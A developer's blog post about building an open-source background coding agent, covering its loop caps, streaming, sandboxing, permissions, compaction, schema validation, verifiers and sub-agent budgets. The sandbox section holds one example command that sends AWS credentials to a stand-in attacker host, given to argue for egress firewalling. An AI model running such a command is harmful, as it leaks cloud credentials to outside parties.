Building Background Agents

@dalexeenko|May 19, 2026 (2d ago)9 views

In the summer of 2025, sitting on a patio next to Jardim da Estrela in Lisbon, a group of friends at a dinner asked me what I'm excited about in tech. Naturally, I said AI. But it wasn't until November of last year, when I pointed my OpenCode instance at Claude Opus 4.5, that I actually got hooked.

I'd always been curious about the engineering problems one has to solve to build an orchestration harness on top of a large language model. How do you build a tool that relentlessly pushes toward progress, instead of a single transactional response that tells you that you're absolutely right?

The best way to find out is, of course, to build one. So I did (with the help of a good friend, Brian Brunner). Below is the exploration of building something similar to Stripe Minions, Ramp Inspect or Shopify River.

The agent streams tool calls and bash output in real time as it scaffolds a TypeScript project.

What the system actually does

Everything starts with a chat window, then the system spawns a worker per project, the worker calls an LLM in a loop and uses tools to make real changes on disk, and a stream of events flows back to you in real time. There are four moving parts:

A web app running in your browser, that's a chat window.
A server. It listens on a port, owns the database of projects, and is the only part of the system that ever talks to the workers.
An agent — one Node.js process per project, spawned by the server on demand. This is the actual robot. It calls the model, executes tools, writes files, runs commands, and emits events about everything it does.
A model. Can be Claude, GPT, Kimi, etc. The architecture is model-agnostic; you can swap in anything that speaks the Anthropic-style tool-calling protocol.

The flow looks like this:

Browser
  │  POST /prompt/stream
  ▼
Server (port 6647)
  │  spawn / connect
  ▼
Agent (per-project Node process)
  │  HTTPS
  ▼
Model

Every interesting design decision in the system is about what happens within one of these transitions.

The big for loop

First things first, the agent loop. The agent's job is to take a single user message and turn it into a result. Doing that usually takes more than one model call. The loop is quite simple:

1. Ask the model what to do next
2. If the model returned no tool calls → done
3. Otherwise, execute each tool, append the results, and loop

The loop in Ants is a for loop capped at two hundred iterations. The cap here matters: a model that gets confused can sit in a loop calling ls forever, and you don't want to find out about it because your bill exceeded the alert threshold. Hence, you need a cap.

packages/core/src/prompt/executor.ts

const recentSignatures: string[] = []
 
for (let i = 0; i < MAX_ITERATIONS; i++) {
  const response = await model.complete({ messages, tools })
  messages.push(response)
 
  if (response.toolCalls.length === 0) return // model is done
 
  const sig = JSON.stringify(response.toolCalls.map(c => [c.name, c.input]))
  recentSignatures.push(sig)
  if (recentSignatures.slice(-5).every(s => s === sig)) {
    throw new Error("agent stuck: 5 identical tool calls in a row")
  }
 
  for (const call of response.toolCalls) {
    messages.push({ role: "tool", id: call.id, content: await tools.run(call) })
  }
}
throw new Error(`hit ${MAX_ITERATIONS} iteration cap`)

There is a second cap here that catches a more interesting failure mode. Every iteration, the agent computes a call signature, a serialization of the tool names and arguments it just asked for. The last five signatures are kept in a rolling buffer. If all five are identical, the agent is stuck and the loop throws; the same call against the same arguments five times in a row is almost never the right answer.

Both of those safeguards exist for the same reason: a loop that won't stop on its own.

The opposite question — how the loop knows when there's nothing left to do — turns out to be challenging. The common convention is implicit: the model produces an assistant message with no tool calls, and the loop exits. There is no explicit "complete" tool. The model itself decides when it's done.

But it has a couple of problems:

First is that "no tool calls" isn't exactly the same thing as "the model finished". The model can also send a stop_reason (e.g., due to max_tokens, etc.). I shipped a version of Ants that didn't look at that part of the response: the Anthropic client received stop_reason and dropped it. A response that hit max_tokens with no tool calls in the final block looked like completion. The fix is to normalize the model's stop signal into the response object, treat end_turn/stop as done, and surface everything else as incomplete or retryable.

Second, recovery from tool failure. When npm install fails because the npm registry was flaky, should you feed stderr back and let the model try again, or escalate? Most agents just feed it back. Usually fine, but it can turn a flaky network call into a long retry loop. You need to classify tool errors: transient (retry with backoff), user-correctable (surface to the user), and fatal (abort the session) — and put policy around each.

Finally, it's a good idea to have a few layers of verification on top: did the tests actually pass, did the function actually compile, did the schema actually validate. If not, reject the model's notion of done until the world agrees.

Streaming

An under-appreciated part of building an agent harness is the streaming pipeline. The user doesn't want to wait fifteen seconds for the agent to "think". They want to see text appear word-by-word, and they want to see "calling bash..." flash up the moment the tool fires.

That means events have to flow three hops in real time:

Model  ──SSE──▶  Agent (message_start, content_block_delta, tool_use)
Agent  ──SSE──▶  Server (richer protocol: tool results, todo updates, errors)
Server ──SSE──▶  Browser (proxy + event-buffer for replay)

Event-buffering is what makes the chat survive a closed tab. Each session has an append-only event log keyed by _eventIndex. If the browser disconnects, it can reconnect with ?lastEventIndex=N and replay anything it missed. Two tabs subscribed to the same session both get the same fire-hose.

apps/server/src/services/session-event-buffer.ts

class SessionEventBuffer {
  private events: Event[] = []
  private subscribers = new Set<(e: Event) => void>()
 
  append(event: Omit<Event, "_eventIndex">) {
    const e = { ...event, _eventIndex: this.events.length }
    this.events.push(e)
    for (const fn of this.subscribers) fn(e)
  }
 
  subscribe(fromIndex: number, onEvent: (e: Event) => void) {
    for (const e of this.events.slice(fromIndex)) onEvent(e) // replay
    this.subscribers.add(onEvent)
    return () => this.subscribers.delete(onEvent)
  }
}

A non-obvious bug I hit here was that the same async generator was being consumed by two readers. My Anthropic client returned the streaming generator to the executor and, in the same function, started a createResponsePromise(...) that also iterated the generator to assemble the final message object. In case of async generators: each value went to exactly one consumer. So roughly half of every model response was going to the response-promise and the other half was going to the executor. The outcome was that the agent would occasionally drop a sentence mid-stream. Compaction summaries came out missing pieces. The fix is to make the response promise wait on a shared state.done flag that the executor's consumption populates, instead of consuming the generator itself.

Sandboxes everywhere

Once the agent is running, it can execute arbitrary code on your machine. This is where it gets interesting. Typically you have the following options:

Approach	Isolation	Slowdown	Pain
Run as the user on host	none	none	`rm -rf ~`
Git worktree	filesystem only	minimal	still `rm -rf`
Docker container	filesystem + network	seconds	Docker daemon
Firecracker / gVisor	kernel-level	seconds	infra effort
Remote sandbox (Modal, E2B)	full	~100ms network	cost, vendor

The filesystem boundary was the bit I most underestimated. My read/write/edit tools each checked fullPath.startsWith(ctx.workingDirectory). Fine, except /tmp/repo-secrets/file also starts with /tmp/repo. A model walking one directory up lands in someone else's data. One line, subtly wrong, in three files. The right check is to resolve both paths and refuse anything whose relative path begins with .. or is absolute — and run a symlink-realpath pass on top, because a friendly-looking symlink inside the workspace will gladly point at /etc.

Even in a Docker container, curl https://fraud.com/$(cat ~/.aws/credentials) works unless you firewall outbound. The Docker network is bridged by default; the world is reachable. The choices are roughly --network none with an explicit egress proxy for the handful of hosts you actually need (npm, GitHub, the model provider), or an egress allow-list at the firewall.

The agent also needs to push branches, but you don't want it reading ~/.ssh. Issue a short-lived GitHub App token scoped to a single repository, mount it into the container, let it expire in under an hour. Same with model API keys: don't pass ANTHROPIC_API_KEY through to the container if you can route the calls through a server-side proxy that injects the key. Ambient credentials are a class of mistake; eliminate the class, don't whack-a-mole the instances.

Then there's the permission system itself. The first time the agent wants to run git push, ask the user; subsequent calls in the same session are allowed without prompting. Ants does this in packages/core/src/permissions.ts — there's an alwaysAllow list, an ask mode, and a deny list, and the executor enforces them around every tool call.

packages/core/src/permissions.ts

type Decision = "allow" | "ask" | "deny"
 
async function check(call: ToolCall, session: Session): Promise<Decision> {
  if (session.deny.matches(call)) return "deny"
  if (session.alwaysAllow.matches(call)) return "allow"
 
  const decision = await session.askUser(call) // suspends the loop
  if (decision === "always") session.alwaysAllow.add(call.signature)
  return decision === "always" ? "allow" : decision
}

Sandbox code should be default-deny. My Docker manager mounted the project read-write, passed through environment secrets, and only enabled a network policy if one was explicitly configured. That is exactly backwards. The right defaults are read-only mounts (with one explicit write layer), no inherited env, network off until configured. You only get to be permissive by name.

Context window management and compaction

Every LLM conversation eventually outgrows the model's context window (1M tokens these days; crazy to think how it was 10k tokens just three years ago). A long session, especially the one with tool calls and results in it, will hit the limit within less than an hour. You have to summarize the conversation to keep it moving (compaction).

You can do this in three layers: proactively at the start of each user turn if the window's grown past a threshold, defensively right before the API call if the payload is over ~95% of the model limit, and reactively after a context_length_exceeded error from the API.

The summary itself is an LLM call. A fixed prompt asks the model for a structured summary: tasks completed, files modified, key decisions, problems encountered, current state, next steps. That summary becomes message zero in the next prompt sent to the model, and the agent's working window is, by definition, "everything from the most recent summary to the present."

A subtle but useful reframe here: the working window isn't the conversation. The conversation lives in the same SessionEventBuffer from earlier — the append-only event log, durable, complete — and the working window is a view the harness computes from it each turn. Summarization is one view; the raw tail is another; a retrieval cut ("the eight events most relevant to the next user message") is a third. Once you see it that way, nothing about old events is irreversible. You don't throw them away when you compact; you stop including them in the next view. If the summary turns out to be lossy, the events themselves are still there.

The interesting failure modes here are not the obvious ones. Compaction quality matters more than compaction frequency. A bad summary leads to the agent re-deciding the question incorrectly, or worse, undoing its earlier work. You end up with a game of broken telephone. Compaction is one of the few places where the system can actively make itself worse — and the only honest fix is to keep the underlying log around so you can recover.

Compaction is also the cheapest of three patterns for "the model can't hold everything in its head"; retrieval (embed past messages, pull what's relevant) and structured memory (Claude Code's memory tool, remember(fact) / recall(query)) are the other two. A serious system uses all three as different view strategies over the same event log. Ants only really uses compaction today, which is the honest answer to why it forgets what you told it last week.

Tool definitions are prompts (and they have to be valid JSON Schema)

I want to use one bug I hit this week to illustrate a more general lesson.

After everything else was wired up, my agent kept hanging on its first model call. I'd added an ANTHROPIC_API_KEY, the server logs showed the request going out, and then nothing. The agent process was alive but waiting forever. The chat sat on a "Thinking…" indicator with no diagnostic of any kind:

The chat sat on a 'Thinking...' indicator with no diagnostic — the user message had been posted, the agent had spawned, but the underlying model call was being silently rejected.

The actual error, once I looked at the right log line, was:

tools.18.custom.input_schema: JSON schema is invalid.
It must match JSON Schema draft 2020-12

The nineteenth tool in the array had a schema Claude refused to accept. The cause was that I was generating my tool schemas with zod-to-json-schema set to target: "openApi3". OpenAPI 3.0 is a dialect of JSON Schema that uses nullable: true instead of type: ["string", "null"], doesn't use $defs, and has a handful of other small differences. Claude requires JSON Schema 2020-12 specifically. The fix was three characters — drop the target option — but the lesson is broader.

Tool definitions are prompts, and like prompts, they have a contract with the model. The description text is what the model reads when it decides which tool to call. A tool description that says "use this when you want to edit a file" is a description; a tool description that says "use this for edits where you know the exact previous string; if you only have a fuzzy location, prefer search_replace" is a specification. The model behaves dramatically differently between the two.

The OpenAPI/JSON-Schema dialect issue is the same kind of problem: a contract failure that silently dropped my agent into a stuck state, because the error surfaced from the model only after a few seconds of latency. Validate your tool schemas eagerly — run them through Ajv against the dialect your model requires, as a unit test, on every commit. The class of bug that "the model rejected your schema after a network round-trip" is uniquely painful because nothing in your local environment surfaces it.

Verifiers, or: how the agent measures itself

There is an entire failure mode where the agent thinks it's done, the chat looks great, and the code doesn't actually work. The defense against this is verifiers — small pure functions that score the world after the agent has finished. Ants has them in packages/verifiers:

fileExists(path) — did the file get created?
fileContains(path, pattern) — does it contain the right thing?
scriptOutputs(path, expected) — does running it produce the right stdout?
typescriptCompiles(path) — does tsc --noEmit pass?

Each returns a score between zero and one, and verifiers compose: allPass averages, anyPass takes the max. A task with two verifiers can score 0.5 if the agent produced the right output via a different code path than expected. That partial credit is the whole point — it's what gives you a gradient instead of a binary pass/fail, and it's what makes the harness usable for RL training, not just for evaluation.

packages/verifiers/src/index.ts

type Verifier = (cwd: string) => Promise<number> // 0..1
 
const fileExists = (p: string): Verifier =>
  async cwd => (fs.existsSync(path.join(cwd, p)) ? 1 : 0)
 
const allPass = (...vs: Verifier[]): Verifier =>
  async cwd => {
    const scores = await Promise.all(vs.map(v => v(cwd)))
    return scores.reduce((a, b) => a + b, 0) / scores.length
  }
 
const anyPass = (...vs: Verifier[]): Verifier =>
  async cwd => Math.max(...(await Promise.all(vs.map(v => v(cwd)))))

This is also the part of the system that gets you to "we can A/B test prompt changes" and "we can fine-tune a model against our own benchmark." Without it, every change to the agent is a vibes-based change.

Multi-agent orchestration

Once one agent works, the natural next move is to run several at once. But that opens its own can of worms: when you have N agents, how do they coordinate?

Shared state is the boring half. Two agents editing the same file race each other; last write wins, the other agent's work disappears. The straightforward fix is per-agent worktrees that merge at the end. The simpler-but-uglier one is a checkout lock that serializes writes. Ants does the former; Cursor's background agents do something similar with per-task containers.

The interesting half is the orchestrator-worker pattern: one LLM call splits the task, dispatches sub-tasks to worker agents, then aggregates the results. Each worker has its own context, much smaller than a single monolithic agent would need. The hard part is the aggregation prompt — "here are four PR-like outputs from four sub-agents, merge them sensibly" is not something a model does well by default. The harness has to give the orchestrator the right primitives (the diff, the test results, the verifier scores) and ask a precise question.

Budget enforcement is where I got it wrong. My task tool exposes maxIterations and tokenBudget as parameters a parent agent can set on a child. They look like first-class controls. They aren't. executeSubagent accepted them, prefixed them with an underscore — the universal TypeScript signal for "I'm ignoring this on purpose" — and let the child fall through to the global 200-iteration cap. From the parent's perspective the budget was honored. From the runtime's perspective there was no budget at all. Any control surface a parent agent can set on a child needs to be checked inside the child's loop, after every LLM call and every tool result. Multi-agent systems amplify whatever you got wrong in the single-agent case.

From what I've seen at work, parallelism wins. Two or three workers with small contexts cost less in tokens than one big agent with a giant context, and they finish faster. The catch is that you only get that if your aggregation works and your budget controls are real.

Brian and I worked together for years at Stripe and Cloudflare. He just joined OpenAI. I don't know what an engineering org looks like when most of the code gets shipped by agents instead of engineers. Brian will. Maybe he'll tell me.

Ants is open source at github.com/dalexeenko/ants.